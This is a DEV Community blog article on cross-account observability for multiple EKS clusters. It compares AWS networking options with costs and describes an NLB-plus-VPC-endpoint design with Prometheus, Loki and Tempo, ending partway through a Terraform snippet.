DEV Community: Kirill The latest articles on DEV Community by Kirill (@hatedabamboo). https://dev.to/hatedabamboo https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F2920937%2F64532bce-50c6-4f47-8756-a02b49dcf19f.jpg DEV Community: Kirill https://dev.to/hatedabamboo en Centralized EKS monitoring across multiple AWS accounts Kirill Thu, 20 Nov 2025 09:25:45 +0000 https://dev.to/aws-builders/centralized-eks-monitoring-across-multiple-aws-accounts-3cad https://dev.to/aws-builders/centralized-eks-monitoring-across-multiple-aws-accounts-3cad <p>Complex systems require extensive monitoring and observability. Systems as complex as Kubernetes clusters have so many moving parts that sometimes it's a task and a half just to configure their monitoring properly. Today I'm going to talk in depth about cross-account observability for multiple EKS clusters, explore various implementation options, outline the pros and cons of each approach, and explain one of them in close detail. Whether you’re an aspiring engineer seeking best-practice advice, a seasoned professional ready to disagree with everything, or a manager looking for ways to optimize costs -- this article might be just right for you.</p> <h2> Cluster observability </h2> <p>What is good observability? Good observability answers the questions:</p> <ul> <li>How is our cluster doing?</li> <li>Are all the components working as intended?</li> <li>Are there any errors?</li> <li>What about our application?</li> <li>What do our users see?</li> <li>Are they experiencing any issues?</li> </ul> <p>As you can see, apart from the health of the cluster itself, good observability monitors the health of the application and user-facing metrics as well. So far, we can highlight two types of data in our cluster: cluster operational metrics and application metrics.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flob5hpwr2vivi486mu85.webp" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flob5hpwr2vivi486mu85.webp" alt="EKS Cluster Monitoring" width="800" height="600"></a></p> <p>But is that all? Didn't we forget something?</p> <p>How are we going to find out whether we have issues with our services if our monitoring is down? Exactly -- we can't. So we have to introduce meta-monitoring metrics: the data about the health of the monitoring system itself.<br> And now we have three types of metrics.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmmwclsx4kcwir8xikaq6.webp" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmmwclsx4kcwir8xikaq6.webp" alt="EKS Cluster Monitoring Monitoring" width="800" height="600"></a></p> <h2> Observability fundamentals </h2> <p>The bare minimum set of data we can scrape from our cluster comes from the Prometheus Node Exporter (or VictoriaMetrics vmagent). This is the most technical data -- CPU, memory, network latencies, temperature, you name it. It doesn't get more technical than this.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqso0ih2mybip04ll8tez.webp" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqso0ih2mybip04ll8tez.webp" alt="K8s Node" width="800" height="600"></a></p> <p>But should we stop here? Technical data about our system shows only our part of the setup -- the health of the underlying system. It's extremely helpful when something goes very wrong with our service, but it doesn't show the full picture. To see that, we also need visibility into the customer-facing side of our service. We need application metrics: request latency, number of responses, application errors. The good thing is that exposing a metrics endpoint within our application may be enough -- Prometheus will scrape this endpoint by itself without additional daemons.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqujp3u84lobd6ze4hqic.webp" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqujp3u84lobd6ze4hqic.webp" alt="K8s Nodes In A Cluster" width="800" height="600"></a></p> <p>Something's missing, right? For example, where can we see application errors? Not just the error codes or counts, but actual error messages?</p> <p>Sure, <code>kubectl logs my-pod</code> is cool and all, but a production-ready app is rarely a single pod (at least I hope so, for most of us).</p> <p>So we think about log collection as well. This adds yet another pod to each node we have: a log collector agent.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Firs4s9v9bi8z4j0nyrwj.webp" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Firs4s9v9bi8z4j0nyrwj.webp" alt="Cluster With Logging Agent" width="800" height="600"></a></p> <p>Is the picture complete now?</p> <p>Not quite. As mentioned previously, to check whether our monitoring setup is even alive, it would be nice to have some sort of external monitoring -- the monitoring of the monitoring. Monitoringception. Since the sole purpose of this external service is to answer the question of whether the monitoring is alive, it can be a very simple setup: a daemon that queries the monitoring endpoint. Because this daemon must remain alive even when the whole system is down, it has to run outside the perimeter of the application workload -- on an external EC2 instance outside the EKS cluster. To achieve the maximum independence of the system this service can be set up in an entirely different cloud provider or even on a dedicated VPS in a datacenter on another continent (or in your home lab).</p> <p>It can even be done as a dead-man switch: an alert in the monitoring system that should always be in the "failing" state and should turn green only if the monitoring system is down. Don't like constant influx of alerts? Set up an notification when data hasn't been received for X minutes, it should do the trick as well.<sup id="fnref1">1</sup></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffpimdi9hs9c36cqq5hbm.webp" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffpimdi9hs9c36cqq5hbm.webp" alt="Full EKS Cluster" width="800" height="600"></a></p> <h2> Cross-account observability </h2> <p>Now let's crank it up a notch.</p> <p>This is what a service architecture might look like. But in modern development, it rarely is like this. Mature businesses typically divide their infrastructure by environments -- at the very least, development and production. They might also include, but are not limited to, staging, UAT, etc.</p> <p>So we spin up both environments in the same cluster, but in different namespaces, right?</p> <p>This is a bad practice, as resources are still shared between both applications, and one can affect the other in ways we wouldn't want.</p> <p>The other option is to spin up another environment in the same AWS account, but on a different cluster. Is this a good option? Most likely, yes. Buuuut the <a href="https://docs.aws.amazon.com/wellarchitected/latest/framework/sec_securely_operate_multi_accounts.html" rel="noopener noreferrer">Well-Architected Framework</a> and other guidelines advise against sharing a single account between several environments. Full environment separation is better for both account and application security.</p> <p>So now we have two AWS accounts.</p> <p>It was fairly simple to organize observability within a single account -- the networks were contained, enclosed in a single perimeter, and available directly from one endpoint to another. Having several accounts introduces the complexity of cross-account networking and finally brings us to the actual topic of this article.</p> <h2> Cross-account networking options </h2> <p>As with every task in cloud operations, this topic can be approached in several ways:</p> <ol> <li>VPC Peering</li> <li>AWS Transit Gateway</li> <li>AWS NLBs with VPC Endpoints and VPC Endpoint Services</li> <li>AWS VPN / Direct Connect</li> <li>Public internet + Authorization + TLS</li> </ol> <p>Let's discuss each of them briefly.</p> <blockquote> <p><strong>NOTE</strong><br> For the examples below, the cost of each implementation will include only additional charges (i.e., networking and service charges). The price of the monitoring services (Prometheus + storage, Grafana, etc.) will not be referenced.</p> <p><strong>NOTE</strong><br> A table summarizing all the options with detailed price breakdown and implementation complexity comparisons can be found in the annex.</p> </blockquote> <h3> VPC Peering </h3> <p>This option assumes creating multiple VPC Peering connections from the root account to branched accounts. It is quite cheap and may work well for small organizations with one or two accounts. It may also work if you only plan to create your infrastructure, because it requires CIDR planning: VPC CIDRs cannot overlap with this option. On top of that, you will have to configure route tables manually for each account. On the bright side: same-AZ traffic is free, and VPC peering is also free.</p> <h4> Pros </h4> <ul> <li>Native AWS networking, low latency</li> <li>No additional data transfer costs within the same region</li> <li>Simple security model with Security Groups</li> <li>Direct IP connectivity, no NAT required</li> </ul> <h4> Cons </h4> <ul> <li>Non-transitive routing (requires mesh topology for 4+ accounts)</li> <li>CIDR blocks cannot overlap between VPCs</li> <li>Manual route table management for each peering</li> </ul> <h3> AWS Transit Gateway </h3> <p>This setup looks more like an enterprise-scale solution: better convenience, higher price. It allows for centralized management of the observability networking setup but requires extensive route planning. It is, however, very scalable by utilizing Transit Gateways, which can be attached to a <a href="https://docs.aws.amazon.com/vpc/latest/tgw/transit-gateway-quotas.html#attachments-quotas" rel="noopener noreferrer">large number of accounts</a>. It can also be shared across organization accounts via Resource Access Manager (one more point for house Enterprise).</p> <h4> Pros </h4> <ul> <li>Scalable to hundreds of VPCs</li> <li>Centralized management</li> <li>Supports overlapping CIDR blocks with routing domains</li> <li>Single point of policy enforcement</li> <li>Can be shared across accounts via Resource Access Manager</li> </ul> <h4> Cons </h4> <ul> <li>Pricy</li> <li>Additional hop adds ~1-2 ms latency</li> <li>More complex initial setup</li> <li>Bandwidth limits per VPC attachment (50 Gbps burst)</li> <li>Requires careful route table planning</li> </ul> <h3> AWS NLBs + VPC Endpoints and VPC Endpoint Services </h3> <p>The third option, almost the golden mean, involves exposing services via Network Load Balancers and Endpoint Services and connecting to them via VPC Endpoints. It is cheaper than the previous option but more expensive than the first. NLBs and VPC Endpoints cost money to simply run. On the other hand, it doesn't limit the number of accounts that can be connected, doesn't require route table configuration, doesn't traverse the public internet unexposed, and with one-to-many connections, you only need to configure a small number of endpoints and endpoint services.</p> <h4> Pros </h4> <ul> <li>No CIDR overlap issues</li> <li>Works across regions</li> <li>Manual control over who can connect: accept/refuse endpoint service connections</li> <li>Private connectivity without internet exposure</li> <li>No route table modifications needed</li> </ul> <h4> Cons </h4> <ul> <li>Higher cost</li> <li>Requires NLB per source cluster</li> <li>Additional latency from the NLB layer</li> <li>Cross-region data transfer can be expensive</li> </ul> <h3> AWS VPN / Direct Connect </h3> <p>This option is an overkill unless you have a dedicated NOC department, because it has all the fun: full network connectivity, encrypted traffic, interface configuration, BGP configuration, and many associated charges for traffic and connection speed.</p> <h4> Pros </h4> <ul> <li>Full network connectivity</li> <li>Can support multiple use cases beyond monitoring</li> <li>Encrypted tunnels</li> <li>Direct Connect offers dedicated bandwidth and lower latency</li> </ul> <h4> Cons </h4> <ul> <li>Requires a specialized NOC department</li> <li>You will have to have an existing datacenter to justify using Direct Connect</li> <li>High cost (especially Direct Connect)</li> <li>Complex setup and management</li> <li>VPN has bandwidth limitations (~1.25 Gbps per tunnel)</li> <li>Direct Connect has long setup times (weeks)</li> <li>Requires BGP knowledge for Direct Connect</li> </ul> <h3> Public Internet + Authorization + TLS </h3> <p>And the final option: the very basic "just shove it onto the public internet and slap a login page on top of it" approach. Super simple to set up! Just spin up an ALB before the Prometheus instance, season it with TLS certificates, and expose it to the public internet. Super unsafe! Works for hobby and experimental projects. Please don't use in a production environment (unless you are absolutely certain -- but still, please don't).</p> <h4> Pros </h4> <ul> <li>Simplest networking</li> <li>No VPC connectivity required</li> <li>Works across any AWS accounts/regions</li> <li>Easy to test and debug</li> <li>Lowest AWS networking costs</li> </ul> <h4> Cons </h4> <ul> <li>Security concerns</li> <li>Data transfer over public internet</li> <li>Potential latency/reliability issues</li> <li>Harder to pass security audits</li> <li>Need to manage SSL certificates</li> <li>Vulnerable to DDoS</li> </ul> <p>As you can see, there are several options to consider and choose from. All of them have their pros and cons. For my scenario, I ended up choosing to set up NLBs with VPC Endpoints.</p> <p>Why?</p> <p>The first reason is that it's relatively easy to implement. To set up a connection between accounts, we need only an endpoint service and endpoints in the other accounts (plural). They connect in a one-to-many relationship: one endpoint service can handle several connecting endpoints.</p> <p>The second reason is that I had overlapping CIDRs in each account, so VPC Peering was immediately off the table.</p> <p>The third reason is that it has moderately less configuration overhead. I won't have to configure client connections or route tables. Proper routing between multiple accounts is a very precise art at which I most certainly suck.</p> <p>And the last reason is that it's still quite secure. The traffic from services doesn't leave the AWS network, doesn't traverse the public internet, and connections are only allowed after approval (it can be configured to auto-approve, though, which may be convenient -- but healthy paranoia is my constant companion).</p> <h2> Chosen cross-account solution </h2> <p>The whole system is actually not that overcrowded.</p> <p>For the sake of this article, let's assume we have three products: Bulba, Char, and Squi. Each product has two environments: normal and sparkling. We also have a root account (let's call it Ketch) for organization management and, for simplicity, observability as well. This gives us seven AWS accounts and seven EKS clusters. Why seven and not six? Well, the root account also runs an EKS cluster as an observability backend.</p> <p>Each product account (Bulba, Char, and Squi) includes the following elements:</p> <ul> <li>EKS cluster: <ul> <li>Prometheus server</li> <li>Node exporter pods</li> <li>Logs and traces collector pods (for my setup, Alloy, I choose you!)</li> <li>Internal NLB to expose the Prometheus backend as a service (only in the private subnet)</li> </ul> </li> <li>Endpoint service that exposes the NLB for Prometheus. For each deployed endpoint service, a corresponding endpoint must be created in the root account (more on that later)</li> <li>Endpoint for connecting to the root account logging solution (Loki)</li> <li>Endpoint for connecting to the root account tracing solution (Tempo)</li> <li>Security groups with allowed ingress and egress ports</li> </ul> <p>The root account (Ketch) also contains several elements:</p> <ul> <li>EKS cluster: <ul> <li>Prometheus server: centralized Prometheus backend that queries federated Prometheus backends in product accounts</li> <li>Loki backend, which receives logs from product accounts</li> <li>Tempo backend, which receives traces from product accounts</li> <li>Internal NLB to expose Loki backend as a service (in the private subnet)</li> <li>Internal NLB to expose Tempo backend as a service (in the private subnet)</li> </ul> </li> <li>S3 buckets for chunks and logs (Loki)</li> <li>S3 bucket for traces (Tempo)</li> <li>Endpoints for connecting to product account Prometheus backends in federated mode</li> <li>Endpoint service for Loki, which accepts endpoint connections from product accounts</li> <li>Endpoint service for Tempo, which accepts endpoint connections from product accounts</li> <li>Security groups with allowed ingress and egress ports</li> </ul> <p>That's quite a lot of components to keep track of. Luckily, we have IaC to ease the configuration and deployment of these components.</p> <p>To understand why so many components are needed (particularly the endpoint service-endpoint pairs), we need to look at the traffic flow model.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fzedkahg2hzg4effjnfw2.webp" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fzedkahg2hzg4effjnfw2.webp" alt="Prometheus cross-account connections" width="800" height="600"></a></p> <p>Zooming in a bit, we can see the exact details of how the connection is configured.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvvvsdvpwm72lwmyypv73.webp" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvvvsdvpwm72lwmyypv73.webp" alt="Prometheus connection setup" width="800" height="600"></a></p> <p>Since our goal is to keep metrics data secure and prevent it from traversing public subnets or the public internet, we create an endpoint service. This service acts as an open receiver on one account (the product account) for the connector on the root account. This creates a 1-to-1 connection that is both secure and governed, since requests to connect to the endpoint service must be approved.</p> <p>The setup for metrics differs from the setup for logs and traces.</p> <p>Prometheus uses a pull model: the backend queries the endpoints for data, effectively pulling the data from them. Loki and Tempo, however, use a push model: deployed logs and traces collection pods send (push) the data to the centralized backend.</p> <p>In this case, the endpoint service/endpoint pair is reversed and simpler: only one endpoint service per service (two in total) is created in the root account, and all product accounts create endpoints and request connections with the root endpoint service.</p> <p>And this is how the accounts look in the end:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fw6mkty0dunal341kjr84.webp" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fw6mkty0dunal341kjr84.webp" alt="Product account" width="800" height="608"></a></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpi1ebrju91ychwfo8ayl.webp" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpi1ebrju91ychwfo8ayl.webp" alt="Root account" width="800" height="608"></a></p> <blockquote> <p><strong>TIP</strong><br> For consistency, you might want to use a metrics-gathering service with a push model (e.g., the aforementioned VictoriaMetrics vmagent). This way, endpoint services are only created in the root account, and product accounts only have endpoints.</p> </blockquote> <h2> Operational considerations </h2> <p>As mentioned previously, the solution I chose in this article is not the only correct one out there. For this setup, I had specific requirements that needed to be fulfilled, as well as particular implementation caveats to consider.</p> <p>My example is definitely not the cheapest option. The cheapest would be using VPC Peering. But unfortunately, my existing setup -- with the same CIDRs in EKS clusters and the possibility to extend beyond those six (+1) AWS accounts -- made this option unavailable.</p> <p>The described setup is also located in a single region -- in cross-region data transfer scenarios, costs can increase drastically and very quickly. For each additional region, an additional VPC endpoint/service will have to be created.</p> <p>There's also always the possibility to just expose the backend ports to the public internet (with proper authorization, of course!) and don't bother with endpoint configuration entirely. But even with TLS-encrypted traffic, this is a rather unsafe option and will absolutely not help you pass any SOC 1/SOC 2/ISO 27001 certification.</p> <h2> Closing thoughts </h2> <p>This was a very interesting challenge to tackle and implement -- I had an absolute blast setting up the POC and confirming that it works. I was excited by the variety of options I could choose from and the differences between the tools available in these scenarios.</p> <p>And I think it's beautiful. It not only shows the complexity of AWS services (which can sometimes be a downside), but also that there's always more than one solution to each problem. Every engineer will approach a challenge differently -- which, in my humble opinion, means our jobs are secure for the observable future.</p> <p>Thank you for reading, and see you in the next one!</p> <h2> Annex </h2> <h3> A. Summarizing table </h3> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Option</th> <th>CIDRs can overlap</th> <th>Scalability</th> <th>Implementation Complexity</th> <th>Price</th> </tr> </thead> <tbody> <tr> <td>VPC Peering</td> <td>X</td> <td>●○○</td> <td>●●○○</td> <td>$</td> </tr> <tr> <td>AWS Transit Gateway</td> <td>✓</td> <td>●●●</td> <td>●●●○</td> <td>$$$</td> </tr> <tr> <td>AWS NLBs + VPC Endpoints + Services</td> <td>✓</td> <td>●●○</td> <td>●●○○</td> <td>$$</td> </tr> <tr> <td>AWS VPN / Direct Connect</td> <td>✓</td> <td>●●●</td> <td>●●●●</td> <td>$$$-$$$$</td> </tr> <tr> <td>Public internet + Authorization + TLS</td> <td>✓</td> <td>●●●</td> <td>●○○○</td> <td>$$</td> </tr> </tbody> </table></div> <h3> B. Price breakdown </h3> <p>The variety, complexity and difference of the outlined options require more in-depth research than outlined in the scope of this article. I agree with that. To make your life easier and to highlight the cryptic $ signs in the table above, I decided to create an example price breakdown and give you some specific numbers, based on which you can at least in some proximity figure whether an option is sutable for you or not.</p> <p>To keep the numbers comparable, we will assume the following prerequisites:</p> <ul> <li>5 AWS accounts (1 root and 4 product accounts)</li> <li>All accounts are located in single region (us-west-2), but in multiple AZs</li> <li>500 GB of data transferred monthly</li> <li>Each account has an EKS cluster with 2 nodes (c7a.medium) in each</li> <li>750 GB of storage for 1 month data retention and a little extra</li> </ul> <h4> Option 1: VPC Peering </h4> <ul> <li>VPC Peering Connections: 4 × $0 = $0 / month</li> <li>Data Transfer (cross-AZ<sup id="fnref2">2</sup>, bidirectional): 500 GB × 2 × $0,01/GB = $10/month</li> <li>NLBs in product accounts (Prometheus): 4 × $16.20/month = $64.80/month</li> <li>NLB in root account (Loki): $16.20/month</li> <li>NLB LCU charges: 500 GB × $0.006/GB = $3/month</li> <li>EC2 instances for EKS: 10 × $37.46/month = $374.6/month</li> <li>EBS storage (gp3): 750 GB × $0.08/GB = $60/month</li> </ul> <p>Total Monthly Cost: <strong>$528.6</strong></p> <h4> Option 2: AWS Transit Gateway </h4> <ul> <li>Transit Gateway: $36/month</li> <li>TGW VPC Attachments: 5 × $0.05/hr = $180/month</li> <li>TGW Data Transfer: 500 GB × $0.02 = $10/month</li> <li>Data Transfer (cross-AZ, bidirectional): 500 GB × 2 × $0,01/GB = $10/month</li> <li>EC2 instances for EKS: 10 × $37.46/month = $374.60/month</li> <li>EBS storage (gp3): 750 GB × $0.08/GB = $60/month</li> </ul> <p>Total Monthly Cost: <strong>$634.6</strong></p> <h4> Option 3: AWS NLBs + VPC Endpoints + Services </h4> <ul> <li>VPC Endpoints in root account (Prometheus): 4 × $0.01/hr = $28.4/month</li> <li>VPC Endpoints in product account (Loki): 4 × $0.01/hr = $28.4/month</li> <li>VPC Endpoint Data Transfer: 500 GB × $0.01/GB = $5/month</li> <li>NLBs in product accounts (Prometheus): 4 × $16.20/month = $64.80/month</li> <li>NLB in root account (Loki): $16.20/month</li> <li>NLB LCU charges: 500 GB × $0.006/GB = $3/month</li> <li>Data Transfer (cross-AZ, bidirectional): 500 GB × 2 × $0,01/GB = $10/month</li> <li>EC2 instances for EKS: 10 × $37.46/month = $374.60/month</li> <li>EBS storage (gp3): 750 GB × $0.08/GB = $60/month</li> </ul> <p>Total Monthly Cost: <strong>$590.4</strong></p> <h4> Option 4a: Site-to-Site VPN </h4> <ul> <li>VPN Connections: 4 × $0.05/hour = $144/month</li> <li>VPN Data Transfer: 500 GB × $0.09/GB = $45/month</li> <li>Data Transfer (cross-AZ, bidirectional): 500 GB × 2 × $0,01/GB = $10/month</li> <li>EC2 instances for EKS: 10 × $37.46/month = $374.60/month</li> <li>EBS storage (gp3): 750 GB × $0.08/GB = $60/month</li> </ul> <p>Total Monthly Cost: <strong>$633.6</strong></p> <h4> Option 4b: AWS Direct Connect </h4> <ul> <li>Direct Connect Port (1 Gbps): $0.30/hour = $216/month</li> <li>Direct Connect Data Transfer: 500 GB × $0.02 = $10/month</li> <li>Data Transfer (cross-AZ, bidirectional): 500 GB × 2 × $0,01/GB = $10/month</li> <li>EC2 instances for EKS: 10 × $37.46/month = $374.60/month</li> <li>EBS storage (gp3): 750 GB × $0.08/GB = $60/month</li> </ul> <p>Total Monthly Cost: <strong>$670.6</strong><sup id="fnref3">3</sup></p> <h4> Option 5: Public Internet + TLS + Auth </h4> <ul> <li>NLBs in product accounts (Prometheus): 4 × $16.20/month = $64.80/month</li> <li>NLB in root account (Loki): $16.20/month</li> <li>NLB LCU charges: 500 GB × $0.006/GB = $3/month</li> <li>Data Transfer (out to the internet): 500 GB × $0.09/GB = $45/month</li> <li>EC2 instances for EKS: 10 × $37.46/month = $374.60/month</li> <li>EBS storage (gp3): 750 GB × $0.08/GB = $60/month</li> </ul> <p>Total Monthly Cost: <strong>$563.6</strong></p> <blockquote> <p>For pricing calculations, I used the following AWS resources::</p> <ul> <li><a href="https://aws.amazon.com/vpc/pricing/" rel="noopener noreferrer">Amazon VPC pricing</a></li> <li><a href="https://aws.amazon.com/elasticloadbalancing/pricing/" rel="noopener noreferrer">Elastic Load Balancing pricing</a></li> <li><a href="https://aws.amazon.com/ec2/pricing/on-demand/" rel="noopener noreferrer">Amazon EC2 On-Demand Pricing</a></li> <li><a href="https://aws.amazon.com/ebs/pricing/" rel="noopener noreferrer">Amazon EBS pricing</a></li> <li><a href="https://calculator.aws/" rel="noopener noreferrer">AWS Pricing Calculator</a></li> </ul> <p>As well as this handy AWS EC2 instance and price comparison tool:</p> <ul> <li><a href="https://aws-pricing.com/" rel="noopener noreferrer">Amazon EC2 Instance Type Comparison</a></li> </ul> </blockquote> <h3> C. IaC snippets </h3> <p>The code presented in this section does not represent a fully working infrastructure. It highlights only the most relevant parts of the PoC implementation. It has not been tested and serves solely as a reference. You can copy it, but without additional initial setup (at minimum a VPC and an EKS cluster) and further adjustments, it will not work. Use at your own risk!</p> <h4> Product account </h4> <div class="highlight js-code-highlight"> <pre class="highlight hcl"><code><span class="c1"># variables.tf</span> <span class="nx">variable</span> <span class="s2">"eks_nlb_endpoint_services"</span> <span class="p">{</span> <span class="nx">description</span> <span class="p">=</span> <span class="s2">"EKS NLB endpoint services configuration"</span> <span class="nx">type</span> <span class="p">=</span> <span class="nx">map</span><span class="p">(</span><span class="nx">object</span><span class="p">({</span> <span class="nx">nlb_arn</span> <span class="p">=</span> <span class="nx">list</span><span class="p">(</span><span class="nx">string</span><span class="p">)</span> <span class="nx">allowed_principals</span> <span class="p">=</span> <span class="nx">list</span><span class="p">(</span><span class="nx">string</span><span class="p">)</span> <span class="p">}))</span> <span class="p">}</span> <span class="nx">variable</span> <span class="s2">"loki_service_name"</span> <span class="p">{</span> <span class="nx">description</span> <span class="p">=</span> <span class="s2">"VPC Endpoint Service name for Loki"</span> <span class="nx">type</span> <span class="p">=</span> <span class="nx">string</span> <span class="p">}</span> <span class="nx">variable</span> <span class="s2">"tempo_service_name"</span> <span class="p">{</span> <span class="nx">description</span> <span class="p">=</span> <span class="s2">"VPC Endpoint Service name for Tempo"</span> <span class="nx">type</span> <span class="p">=</span> <span class="nx">string</span> <span class="p">}</span> <span class="nx">variable</span> <span class="s2">"vpc_id"</span> <span class="p">{</span> <span class="nx">type</span> <span class="p">=</span> <span class="nx">string</span> <span class="p">}</span> <span class="nx">variable</span> <span class="s2">"private_subnet_ids"</span> <span class="p">{</span> <span class="nx">type</span> <span class="p">=</span> <span class="nx">list</span><span class="p">(</span><span class="nx">string</span><span class="p">)</span> <span class="p">}</span> <span class="nx">variable</span> <span class="s2">"name_prefix"</span> <span class="p">{</span> <span class="nx">type</span> <span class="p">=</span> <span class="nx">string</span> <span class="p">}</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight hcl"><code><span class="c1"># main.tf</span> <span class="nx">resource</span> <span class="s2">"aws_vpc_endpoint_service"</span> <span class="s2">"nlb_endpoint_services"</span> <span class="p">{</span> <span class="nx">for_each</span> <span class="p">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">eks_nlb_endpoint_services</span> <span class="nx">acceptance_required</span> <span class="p">=</span> <span class="kc">true</span> <span class="nx">allowed_principals</span> <span class="p">=</span> <span class="nx">each</span><span class="p">.</span><span class="nx">value</span><span class="p">.</span><span class="nx">allowed_principals</span> <span class="nx">network_load_balancer_arns</span> <span class="p">=</span> <span class="nx">each</span><span class="p">.</span><span class="nx">value</span><span class="p">.</span><span class="nx">nlb_arn</span> <span class="p">}</span> <span class="nx">resource</span> <span class="s2">"aws_security_group"</span> <span class="s2">"observability"</span> <span class="p">{</span> <span class="nx">name</span> <span class="p">=</span> <span class="s2">"${var.name_prefix}-observability"</span> <span class="nx">description</span> <span class="p">=</span> <span class="s2">"Allow traffic from observability resources"</span> <span class="nx">vpc_id</span> <span class="p">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">vpc_id</span> <span class="p">}</span> <span class="nx">resource</span> <span class="s2">"aws_vpc_security_group_ingress_rule"</span> <span class="s2">"loki"</span> <span class="p">{</span> <span class="nx">security_group_id</span> <span class="p">=</span> <span class="nx">aws_security_group</span><span class="p">.</span><span class="nx">observability</span><span class="p">.</span><span class="nx">id</span> <span class="nx">description</span> <span class="p">=</span> <span class="s2">"Allow traffic from observability resources: Loki"</span> <span class="nx">cidr_ipv4</span> <span class="p">=</span> <span class="s2">"10.0.0.0/16"</span> <span class="nx">from_port</span> <span class="p">=</span> <span class="mi">8080</span> <span class="nx">to_port</span> <span class="p">=</span> <span class="mi">8080</span> <span class="nx">ip_protocol</span> <span class="p">=</span> <span class="s2">"tcp"</span> <span class="p">}</span> <span class="nx">resource</span> <span class="s2">"aws_vpc_security_group_ingress_rule"</span> <span class="s2">"tempo"</span> <span class="p">{</span> <span class="nx">security_group_id</span> <span class="p">=</span> <span class="nx">aws_security_group</span><span class="p">.</span><span class="nx">observability</span><span class="p">.</span><span class="nx">id</span> <span class="nx">description</span> <span class="p">=</span> <span class="s2">"Allow traffic from observability resources: Tempo"</span> <span class="nx">cidr_ipv4</span> <span class="p">=</span> <span class="s2">"10.0.0.0/16"</span> <span class="nx">from_port</span> <span class="p">=</span> <span class="mi">4317</span> <span class="nx">to_port</span> <span class="p">=</span> <span class="mi">4318</span> <span class="nx">ip_protocol</span> <span class="p">=</span> <span class="s2">"tcp"</span> <span class="p">}</span> <span class="nx">resource</span> <span class="s2">"aws_vpc_endpoint"</span> <span 